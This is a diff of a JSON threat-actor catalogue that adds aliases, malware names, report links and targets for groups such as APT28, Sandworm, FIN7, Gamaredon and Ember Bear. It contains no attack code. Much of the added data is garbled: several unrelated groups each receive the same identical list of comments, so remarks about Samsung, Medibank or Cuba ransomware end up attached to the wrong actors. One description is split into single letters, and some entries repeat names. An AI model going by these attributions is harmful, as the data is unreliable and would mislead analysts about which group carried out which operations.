"https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://threatmatrix.cylance.com/en_us/home/energetic-dragonfly-dymalloy-bear-2-0.html", + "https://securelist.com/energetic-bear-crouching-yeti/85345/", + "https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", + "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "https://www.secureworks.com/research/mcmd-malware-analysis", + "https://www.secureworks.com/blog/own-the-router-own-the-traffic", + "https://us-cert.cisa.gov/ncas/alerts/aa20-296a", + "https://theintercept.com/2020/12/17/russia-hack-austin-texas/", + "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "https://www.dragos.com/blog/how-adversaries-use-spear-phishing-to-target-engineering-staff/" + ], + "targets": [ + "This threat actor targets companies in the education, energy, construction, information technology, and pharmaceutical sectors for the purposes of espionage. It uses malware tailored to target industrial control systems. Energy, Middle East oil and natural gas as the goal, dedicated to gather relevant information, technology company in Western Europe that produces civil, military and critical infrastructure communications equipment" + ], + "external_description": [ + "A", + "c", + "t", + "i", + "v", + "e" + ], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1141386,7 +1148581,8 @@ "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html", "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state", - "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html" + "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-tool-update-telecoms-govt" ], "targets": [ "US Gov and contractors, Western think tanks, Gaming, iGaming, Gambling" @@ -1142867,7 +1150063,7 @@ "NewsBeef", "Phosphorus / Mint Sandstorm", "TA453", - "COBALT MIRAGE, ", + "COBALT MIRAGE, Ballistic Bobcat", "APT35", "Charming Kitten", "Group 83", @@ -1142963,6 +1150159,8 @@ "https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/", "https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/", "https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/", + "https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/", + "https://www.eset.com/int/about/newsroom/press-releases/research/eset-research-iran-aligned-ballistic-bobcat-targets-businesses-in-israel-with-a-new-backdoor/", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/", "https://www.symantec.com/connect/blogs/shamoon-multi-staged-destructive-attacks-limited-specific-targets", @@ -1142978,6 +1150176,7 @@ "https://www.wired.com/story/iran-apt33-industrial-control-systems/", "https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/", "https://thehackernews.com/2022/12/iranian-hackers-strike-diamond-industry.html", + "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing", "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf", "http://www.clearskysec.com/thamar-reservoir/", @@ -1143196,16 +1150395,70 @@ "description": "Unit 42. (2022, February 3). Russia\u2019s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022." } ], - "names": [], - "external_tools": [], + "names": [ + "FSB 16th & 18th Centers", + "Gamaredon Group", + "BlueAlpha", + "Shuckworm", + "ACTINIUM", + "Primitive Bear", + "Trident Ursa", + "Iron Tilden", + "G0047" + ], + "external_tools": [ + "Pterodo", + "QuietSieve", + "DessertDown", + "DinoTrain" + ], "country": [], "operations": [], - "links": [], + "links": [ + "https://lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_FINAL.pdf", + "http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-ukrainian-mod-campaign/", + "https://www.recordedfuture.com/bluealpha-iranian-apts/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/", + "https://www.anomali.com/blog/primitive-bear-gamaredon-targets-ukraine-with-timely-themes", + "https://mp.weixin.qq.com/s/OfDTcrTVAgjACeh0Z5wi7w", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", + "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/#indicators-of-compromise", + "https://cert.gov.ua/article/39386", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine", + "https://blogs.cisco.com/security/network-footprints-of-gamaredon-group", + "https://cert.gov.ua/article/1229152", + "https://cert.gov.ua/article/1229152", + "https://unit42.paloaltonetworks.com/trident-ursa/", + "https://www.secureworks.com/research/threat-profiles/iron-tilden", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military" + ], "targets": [], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1143657,16 +1150910,71 @@ "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021." } ], - "names": [], - "external_tools": [], + "names": [ + "FIN7", + "Carbanak", + "Anunak", + "Coried,Coreid", + "ELBRUS ", + "Carbon Spider,CarbonSpider", + "GOLD NIAGARA", + "Sangria Tempest", + "Calcium", + "ITG14", + "G0046", + "G0008" + ], + "external_tools": [ + "PowerSource" + ], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor", + "https://blog.cyber4sight.com/2017/04/similarities-between-carbanak-and-fin7-malware-suggest-actors-are-closely-related/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf", + "https://www.rsa.com/content/dam/premium/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://securityaffairs.co/wordpress/64083/apt/fin7-new-techniques.html", + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "https://blog.malwarebytes.com/threat-analysis/2019/10/the-forgotten-domain-exploring-a-link-between-magecart-group-5-and-the-carbanak-apt/", + "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://blog.morphisec.com/the-evolution-of-the-fin7-jssloader", + "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc", + "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", + "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf" + ], + "targets": [ + "Bank of Valetta, Malta" + ], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1143940,16 +1151248,107 @@ "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" } ], - "names": [], - "external_tools": [], + "names": [ + "Sofacy", + "APT28", + "Sednit", + "Pawn Storm", + "Group 74", + "Tsar Team", + "Fancy Bear", + "Strontium", + "Swallowtail", + "SIG40", + "Grizzly Steppe", + "TG-4127", + "SNAKEMACKEREL,Armada Collective, Dark Power, G0007, ATK5,Fighting Ursa, ITG05,Blue Athena", + "G0007", + "IRON TWILIGHT" + ], + "external_tools": [ + "CHOPSTICK", + "CORESHELL", + "Winexe", + "SOURFACE", + "OLDBAIT", + "Sofacy", + "XAgent", + "XTunnel", + "WinIDS", + "Foozer", + "DownRange", + "Sedreco Dropper", + "Komplex", + "DealersChoice", + "Downdelph", + "Sednit", + "USBStealer", + "Sedkit", + "HideDrv (Rootkit)", + "LoJax", + "Sofacy", + "SeduUploader" + ], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf", + "https://app.box.com/s/g55oxdd3q63hyngbjm4fbipfct94wrye", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://fancybear.net/", + "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "http://www.welivesecurity.com/2016/10/20/new-eset-research-paper-puts-sednit-under-the-microscope/", + "https://www.crowdstrike.com/blog/danger-close-fancy-bear-tracking-ukrainian-field-artillery-units/", + "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296.pdf", + "https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://apnews.com/3bca5267d4544508bb523fa0db462cb2?utm_campaign=SocialFlow&utm_source=Twitter&utm_medium=AP", + "https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-storm-new-targets-politically-motivated-campaigns/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "https://securelist.com/masha-and-these-bears/84311/", + "https://cdn.area1security.com/reports/Area-1-Security-PhishingBarismaHoldings.pdf", + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", + "https://cybergeeks.tech/skinnyboy-apt28/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html", + "https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine?sref=ExbtjcSG", + "https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-zero-day-used-by-russian-hackers-since-april-2022/", + "https://www.deepinstinct.com/blog/cve-2023-23397-exploitations-in-the-wild-what-you-need-to-know" + ], + "targets": [ + "United States government, Romania, Poland, Jordan, Ukraine, Turkey" + ], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1146329,7 +1153728,7 @@ "HoneyMyte", "BRONZE PRESIDENT", "Temp.Hex", - "TA416, RedDelta, Earth Preta (TrendMicro)", + "TA416, RedDelta, Earth Preta (TrendMicro), Stately Taurus", "G0129" ], "external_tools": [ @@ -1146368,7 +1153767,8 @@ "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware", - "https://thehackernews.com/2023/03/chinese-hackers-targeting-european.html" + "https://thehackernews.com/2023/03/chinese-hackers-targeting-european.html", + "https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/" ], "targets": [ "Mining sector in Mongolia, private individuals |=| gathering geo-political and economic intelligence, NGOs, political & law enforcement org in South and East Asia" @@ -1147952,16 +1155352,51 @@ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020." } ], - "names": [], + "names": [ + "Inception Framework", + "Blue Odin", + "G0100" + ], "external_tools": [], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "https://securelist.com/blog/incidents/57647/the-red-october-campaign/", + "http://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/", + "https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies", + "https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware", + "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/", + "https://securelist.com/recent-cloud-atlas-activity/92016/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt-cloud-atlas-unbroken-threat/", + "https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/" + ], + "targets": [ + "This threat actor targets governments and diplomatic organizations for espionage purposes. Suspected Operator in Ukraine working for Russia or its allies." + ], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1148823,16 +1156258,73 @@ "description": "Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022." } ], - "names": [], - "external_tools": [], + "names": [ + "Ember Bear", + "UAC-0056", + "Lorec53", + "Lorec Bear", + "Bleeding Bear", + "Saint Bear,SaintBear", + "UNC2589", + "TA471", + "DEV-0586", + "Nascent Ursa", + "EmberBear", + "Frozen Vista,FROZENVISTA", + "Ruinous Ursa,Nodaria", + "G1003" + ], + "external_tools": [ + "WhisperGate wiper", + "Elephant Framework", + "Graphiron" + ], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "https://www.microsoft.com/en-us/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "https://cert.gov.ua/article/37704", + "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", + "https://socprime.com/blog/cobalt-strike-beacon-grimplant-and-graphsteel-malware-massively-spread-by-uac-0056-threat-actors-in-targeted-phishing-emails-cert-ua-alert/", + "https://www.crowdstrike.com/blog/who-is-ember-bear/", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", + "https://cert.gov.ua/article/703548", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer", + "https://www.mandiant.com/resources/blog/russia-invasion-ukraine-retaliation", + "https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader", + "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room", + "https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer" + ], + "targets": [ + "Ukraine, limited evidence to suggest that the group has been involved in attacks on targets in Kyrgyzstan. Third-party reporting has also linked the group to attacks on Georgia." + ], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1149116,16 +1156608,87 @@ "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020." } ], - "names": [], - "external_tools": [], + "names": [ + "Sandworm", + "Sandworm Team", + "TEMP.Noble", + "Electrum", + "TeleBots", + "Quedagh Group", + "BE2 APT", + "Black Energy", + "Iridium", + "Hades", + "Voodoo Bear", + "Quedagh", + "Iron Viking ,Grey Energy", + "G0034", + "IRON VIKING" + ], + "external_tools": [ + "CVE-2014-4114", + "Industroyer", + "CrashOverride", + "OlympicDestroyer", + "GreyEngergy Mini as their 1st-stage implant", + "GCat", + "Delphocy", + "Zebrocy", + "Zekapab" + ], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "http://www.isightpartners.com/2014/10/cve-2014-4114/", + "http://www.isightpartners.com/2016/01/ukraine-and-sandworm-team/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-163A", + "https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://cert.gov.ua/article/39518", + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", + "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/" + ], + "targets": [ + "This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Ukrainian energy sector, Eastern Europe. " + ], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1150200,7 +1157763,9 @@ "https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations", "https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247491361&idx=1&sn=244adf7e3491d79b163c627a92cc9218", "https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247491963&idx=1&sn=7926f96c1319a8179770e7fc09bb1fee", - "https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/" + "https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/", + "https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal", + "https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/" ], "targets": [ "Government of India diplomatic and military" @@ -1151003,7 +1158568,13 @@ ], "names": [ "TA551", - "Shathak", + "Shathak,Shatak", + "ATK236", + "Monster Libra", + "G0127", + "Gold Cabin", + "TA551", + "Shathak,Shatak", "GOLD CABIN", "UNC2420", "DEV-0365", @@ -1151013,12 +1158584,21 @@ "G0127" ], "external_tools": [ + "IcedID", + "Valak", + "Sliver", "Valak", "IcedID" ], "country": [], "operations": [], "links": [ + "https://unit42.paloaltonetworks.com/valak-evolution/", + "https://isc.sans.edu/diary/rss/26438", + 